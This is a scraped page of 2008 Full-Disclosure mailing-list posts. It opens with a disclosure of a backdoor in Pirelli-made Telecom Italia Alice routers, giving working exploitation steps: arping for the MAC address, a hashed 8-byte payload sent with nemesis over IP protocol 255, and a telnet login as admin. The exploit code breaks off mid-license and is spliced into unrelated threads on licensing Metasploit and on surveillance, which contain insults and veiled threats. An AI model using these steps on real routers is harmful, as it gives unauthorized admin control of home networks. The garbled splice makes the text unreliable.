[Full-disclosure] Telecom Italia Alice Pirelli routers backdoor discoverd to activate telnet/ftp/tftp from internal LAN/WLAN.

[drpepperONE drpepperONE]

#

  saxdax & drpepperONE


Discovered embedded backdoor to activate telnet/ftp/tftp/web extended
admin interface with Admin privileges, from internal network lan on
Alice ADSL CPE
Modem/Router, manufactered by Pirelli based on Broadcom platform.

#

  saxdax & drpepperONE

Router Vendor:  Alice Telecom Italia CPE Modem/Routers
manufactered by Pirelli
  based on Broadcom platform.

Model Affected: AGA[Alice Gate2 plus
Wi-Fi]/AGB[AliceGate2plus]AG2P-AG3[Alice Gate W2+]
 /AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi]

Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version
are affected.

Platforms: Customized Linux version 2.6.8.1 on
BroadcomBCM96348 chipset.

Vulnerability: enable telnet/ftp/tftp and web-admin
frominternal lan.

Exploitation:  internal network lan, versus Router

Date:13 Oct 2008

Authors:   saxdax & drpepperONE

e-mail: [EMAIL PROTECTED]   [EMAIL PROTECTED]

Risk:   medium>low

#

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

#

===
1) Introduction
===

Telecom Italia is the most important Italian ISP offering an ADSL
service named "Alice".
Telecom Italia rent out with "Alice Adsl" service, different CPE
Modem/Router among which
the affected ones.
The interface to configure these modems are made extremily poor by the
provider to ensure
more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages
from the web interface.

http://www.telecomitalia.com/
http://adsl.alice.it/

#


2) Vulnerability


An attacker can activate and get unauthorized access to the routers
administration
interface and telnet/ftp/tftp services from internal network.

Every user in the LAN (or Wireless LAN) can nevertheless have access
to the routers
administration interface and telnet/ftp/tftp!

If an attacker can get access to the administrator interface and
login, he has full control
over the routers configuration.

#


==
3) The Exploit
==

To enable telnet/ftp/tftp and web-admin interface it is necessary send a special
IP packet to router specific ip 192.168.1.1.
This works only from internal LAN where an attacker have and ip like
192.168.1.XX.
The ip packet send to router must have the following feature:

1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router)
2)Payload size 8 byte
3)The payload are the first 8 byte of a salted md5 of the mac address
of device br0
4)br0 in these modems has the same mac of eth0

When the modem receives the packet all services will be enabled.


Example:


>From a GNU/LINUX distrib:

1)Retrieve br0 maccaddress:

arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)


2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte
long file with the mac address.
  run the application below and copy the output hash.
  http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file
(with the tool you like)

  i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex


4)Telnet to router :

  telnet 192.168.1.1

  BCM96348 ADSL Router
  Login: admin
  Password:



#


===
4) The Code
===

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet   */
/* the mac must be in an hex file and has to be passed as argument to
the program */

#include 
#include 
#include 
#include "md5.h"


/*
 *  RFC 1321 compliant MD5 implementation
 *
 *  Copyright (C) 2001-2003  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  b

Re: [Full-disclosure] security industry software license

[Paul Ferguson]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Oct 13, 2008 at 6:43 PM, rysheve <[EMAIL PROTECTED]> wrote:

> So are you talking about Actionable Intelligence? Why should the
> government be gathering any intelligence on me unless I am the target
> of an investigation? Maybe I should also have to register my I.D. to
> any device that I connect to the Internet. I bet that would provide
> lost of actionable intelligence.
>

For what it's worth, the FBI now does not need a reason to investigate
anyone:

http://centerforinvestigativereporting.org/blogpost/20081006broaderfbipower
snowsetinstone

Enjoy!

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.6.3 (Build 3017)

wj8DBQFI9AEJq1pz9mNUZTMRApMnAJ4qz8Yw8ZQkHtQw6Auy1Xv5jYf5DgCZAQ4F
1BH2jnYX0Gu/orDEFVpWFSI=
=YA/A
-END PGP SIGNATURE-



-- 
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] actionable intelligence

[n3td3v]

What would the scheme be?

On Tue, Oct 14, 2008 at 2:46 AM, vulcanius <[EMAIL PROTECTED]> wrote:
> You should pursue something more realistic, like getting the FD list
> moderated.
>
> On Mon, Oct 13, 2008 at 9:22 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>>
>> how can we start to make intelligence actionable? how can we take
>> intelligence from an idle state into an actionable state? what kind of
>> schemes can we setup to make intelligence more actionable to locker
>> out the bad guys? what can we do as a community to get more of the
>> intelligence that is already held about people, more actionable? i'll
>> leave you with those kind of thoughts as we move forward.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[rysheve]

So are you talking about Actionable Intelligence? Why should the  
government be gathering any intelligence on me unless I am the target  
of an investigation? Maybe I should also have to register my I.D. to  
any device that I connect to the Internet. I bet that would provide  
lost of actionable intelligence.

You proposal does not solve any problems it only creates government  
bloat. If you restrict the use of these tools it complicates the  
ability for the 'good guys' to get them not the 'bad guys'.

Sent from my iPhone

On Oct 13, 2008, at 8:00 PM, n3td3v <[EMAIL PROTECTED]> wrote:

> The intelligence about who downloads metasploit is already there, but
> currently it is not actionable intelligence.
>
> The license scheme would start to make that intelligence actionable,
> without the scheme, you've got intelligence sitting there that can't
> be used in an actionable way.
>
> Its all about making intelligence that is already held actionable.
>
> You've got known cyber criminals and terrorists downloading
> metasploit, but no legislation in place where the good guys can
> benefit and the bad guys be lockered out.
>
> We got to get this situation sorted, the intelligence is there, but
> nothing actionable can be done with it.
>
> We've got to get this license scheme implemented sooner rather than  
> later.
>
> n3td3v
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] actionable intelligence

[vulcanius]

You should pursue something more realistic, like getting the FD list
moderated.

On Mon, Oct 13, 2008 at 9:22 PM, n3td3v <[EMAIL PROTECTED]> wrote:

> how can we start to make intelligence actionable? how can we take
> intelligence from an idle state into an actionable state? what kind of
> schemes can we setup to make intelligence more actionable to locker
> out the bad guys? what can we do as a community to get more of the
> intelligence that is already held about people, more actionable? i'll
> leave you with those kind of thoughts as we move forward.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] actionable intelligence

[n3td3v]

how can we start to make intelligence actionable? how can we take
intelligence from an idle state into an actionable state? what kind of
schemes can we setup to make intelligence more actionable to locker
out the bad guys? what can we do as a community to get more of the
intelligence that is already held about people, more actionable? i'll
leave you with those kind of thoughts as we move forward.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[n3td3v]

The intelligence about who downloads metasploit is already there, but
currently it is not actionable intelligence.

The license scheme would start to make that intelligence actionable,
without the scheme, you've got intelligence sitting there that can't
be used in an actionable way.

Its all about making intelligence that is already held actionable.

You've got known cyber criminals and terrorists downloading
metasploit, but no legislation in place where the good guys can
benefit and the bad guys be lockered out.

We got to get this situation sorted, the intelligence is there, but
nothing actionable can be done with it.

We've got to get this license scheme implemented sooner rather than later.

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[n3td3v]

On Mon, Oct 13, 2008 at 11:00 AM, Michael Simpson
<[EMAIL PROTECTED]> wrote:
> On 10/13/08, n3td3v <[EMAIL PROTECTED]> wrote:
>> On Mon, Oct 13, 2008 at 2:58 AM, vulcanius <[EMAIL PROTECTED]> wrote:
>> > Do you honestly believe such a thing could ever happen or are you just 
>> > speculating for no reason?
>>
>> No I wasn't on drugs when I wrote this email... but mike simpson my
>> new stalker might speculate.
>
> you wish!
>
> you appear to be the one desperate to meet up
>
>>if you want to meet up to sort out your issue, then arrange a
>>date...im sick of you spear targeting me, fuck off.
>
> lol you wanna hurt me :-)
> not sure about the phallic connotations though especially as you seem
> so homophobic in some of your other replies
>
>>Like said previously, im just a bedroom person, I have no power or
>>ability to carry this ambition out, but there may be folks on the list
>>who do, thats the kind of people im trying to influence right now.
>>
>>So while n3td3v has no power or ability, he still has a chance of
>>being an influential figure, either now or in the future.
>
> 
>
>>i had to get this http://www.disclosurescotland.co.uk/aboutds.htm to
>>go on an ethical hacking security course, maybe we can use the same
>>thing for the security industry software license?
>
> whoop-di-doo you don't have a criminal record *yet*
> i'm guessing that most of your l33t hacker mates don't have one either
>
> the big problem with the scottish criminal records office check is
> that it only show people that have been caught and successfully
> prosecuted
> i'm not even sure if the "not proven" verdict gets recorded there
>
> As various people have stated this idea is a non-starter. Move onto
> the next item of the infamous n3td3v agenda.
> Or go and get a job ffs
> In some countries people are ashamed of being unemployed and
> subsisting on state handouts.
>
> I don't mind supporting people that are attempting to move on in their
> lives or who are genuinely unwell, indeed i do it gladly but i have a
> problem with spending tax dollars on eejits that think the world owes
> them something because deep down they feel *so* important.
>
> mike
>

* I'm not a criminal

* I'm not mentally ill

* I'm not a terrorist

* I'm not an elite hacker

Now GTFO, stalker!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[M . B . Jr .]

Any OSI-based set, but without enforcing security-through-obscurity concepts.
Maybe adapting some Bell-LaPadula ideas.
There are lots of models to discuss about. The real question however is:

can we start fresh?


On Mon, Oct 13, 2008 at 1:57 PM, Buhrmaster, Gary <[EMAIL PROTECTED]> wrote:
>
>> >   * writing a whole new set of protocols to be used over a whole new
>> > independent backbone infrastructure; and
>>
>> I suggest the OSI protocol stack, for the security-through-obscurity
>> benefits.  ASN.1, anybody? :)
>>
>
> GOSIP anyone?
>
> I think the DMS was claimed to be more secure
> since it was based on OSI.
>



-- 
Marcio Barbado, Jr.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[Buhrmaster, Gary]

 
> >   * writing a whole new set of protocols to be used over a whole new
> > independent backbone infrastructure; and
> 
> I suggest the OSI protocol stack, for the security-through-obscurity
> benefits.  ASN.1, anybody? :)
>

GOSIP anyone?  

I think the DMS was claimed to be more secure
since it was based on OSI.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: UK government monitoring

[Valdis . Kletnieks]

On Mon, 13 Oct 2008 16:26:57 BST, n3td3v said:
> On Mon, Oct 13, 2008 at 7:31 AM,  <[EMAIL PROTECTED]> wrote:

> > Oh, it *will* help. Just not help with bringing crime down.
> 
> This in reality is nothing to do with crime, but to assist
> http://intelligence.gov.uk to do their job.

As I said - it will help, just not with crime.

> If you don't understand what I mean by that then GTFO.

If you can't learn to read what is actually written, then GTFO. 


pgp0mLWSpFcxo.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[Valdis . Kletnieks]

On Mon, 13 Oct 2008 12:53:31 -0300, "M.B.Jr." said:

>   * writing a whole new set of protocols to be used over a whole new
> independent backbone infrastructure; and

I suggest the OSI protocol stack, for the security-through-obscurity
benefits.  ASN.1, anybody? :)


pgpjRQhOKvcxD.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[M . B . Jr .]

Dear n3td3v, the dreamer,
concerning your suggestion -- which is a noble one -- in a wider context,
you'd better start with two things:

  * writing a whole new set of protocols to be used over a whole new
independent backbone infrastructure; and

  * convincing the world to forget about TCP.



Best regards,



On Thu, Oct 9, 2008 at 10:31 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> there should be a central license that people apply for to use
> software like metasploit.
>
> all the *respected* programmers would require the license before you
> get to download.
>
> anyone can apply for a licence, however only those who meet the
> criteria get given the licence.
>
> background checks are done on you to see you are who you say you are.
>
> that you're not a cyber criminal or terrorist, and that you're going
> to be using the software for the intentions of which the product was
> designed.
>
> verbal contracts never hold ground, saying, this software is for
> testing purposes isn't any guarantee that the bad guys won't use the
> software.
>
> we need a centralised security industry software license scheme so the
> good guys can take full advantage of the tools made by creators of
> security software, while shuttering the bad guys out.
>
> to rely on a "verbal contract" for security software as a safe guard
> is no longer enough for the security industry in light of metasploit
> and other borderline "evil" purpose software.
>
> its time that members of the industry work together to form such a
> scheme, to insure a streamline programme that all the good guys can be
> part of, only letting the good guys use the software for good
> purposes.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Marcio Barbado, Jr.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[n3td3v]

On Mon, Oct 13, 2008 at 11:00 AM, Michael Simpson
<[EMAIL PROTECTED]> wrote:
> you appear to be the one desperate to meet up
>
>>if you want to meet up to sort out your issue, then arrange a
>>date...im sick of you spear targeting me, fuck off.
>
> lol you wanna hurt me :-)
>

you would most likely just be followed home and profiled for the next
6 months, and everything about you put into the big searchable
database...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Uninformed Journal Release Announcement: Volume 10

[fdlist]

Uninformed is pleased to announce the release of its 10th volume which is
composed of 4 articles:

Engineering in Reverse

  - Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) 
GPS
Author: Skywing

  - Using dual-mappings to evade automated unpackers
Author: skape

Exploitation Technology

  - Analyzing local privilege escalations in win32k
Author: mxatone

  - Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
Author: H D Moore

This volume of the journal can be found at: 

  http://www.uninformed.org/?v=10

About Uninformed: 

Uninformed is a non-commercial technical outlet for research in areas 
pertaining to security technologies, reverse engineering, and lowlevel 
programming.  The journal is published roughly three times a year and 
welcomes creative submissions from anyone who is interested in sharing 
knowledge.

  - The Uninformed Staff 
staff [at] uninformed.org 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: UK government monitoring

[n3td3v]

On Mon, Oct 13, 2008 at 7:31 AM,  <[EMAIL PROTECTED]> wrote:
> On Sun, 12 Oct 2008 23:17:38 PDT, James Matthews said:
>
>> I think the irony of the situation is that they have their CCTV cameras for
>> years now and they didn't bring crime down. How will this database help?
>
> Oh, it *will* help. Just not help with bringing crime down.
>

This in reality is nothing to do with crime, but to assist
http://intelligence.gov.uk to do their job.

If you don't understand what I mean by that then GTFO.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security industry software license

[Michael Simpson]

On 10/13/08, n3td3v <[EMAIL PROTECTED]> wrote:
> On Mon, Oct 13, 2008 at 2:58 AM, vulcanius <[EMAIL PROTECTED]> wrote:
> > Do you honestly believe such a thing could ever happen or are you just 
> > speculating for no reason?
>
> No I wasn't on drugs when I wrote this email... but mike simpson my
> new stalker might speculate.

you wish!

you appear to be the one desperate to meet up

>if you want to meet up to sort out your issue, then arrange a
>date...im sick of you spear targeting me, fuck off.

lol you wanna hurt me :-)
not sure about the phallic connotations though especially as you seem
so homophobic in some of your other replies

>Like said previously, im just a bedroom person, I have no power or
>ability to carry this ambition out, but there may be folks on the list
>who do, thats the kind of people im trying to influence right now.
>
>So while n3td3v has no power or ability, he still has a chance of
>being an influential figure, either now or in the future.



>i had to get this http://www.disclosurescotland.co.uk/aboutds.htm to
>go on an ethical hacking security course, maybe we can use the same
>thing for the security industry software license?

whoop-di-doo you don't have a criminal record *yet*
i'm guessing that most of your l33t hacker mates don't have one either

the big problem with the scottish criminal records office check is
that it only show people that have been caught and successfully
prosecuted
i'm not even sure if the "not proven" verdict gets recorded there

As various people have stated this idea is a non-starter. Move onto
the next item of the infamous n3td3v agenda.
Or go and get a job ffs
In some countries people are ashamed of being unemployed and
subsisting on state handouts.

I don't mind supporting people that are attempting to move on in their
lives or who are genuinely unwell, indeed i do it gladly but i have a
problem with spending tax dollars on eejits that think the world owes
them something because deep down they feel *so* important.

mike

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/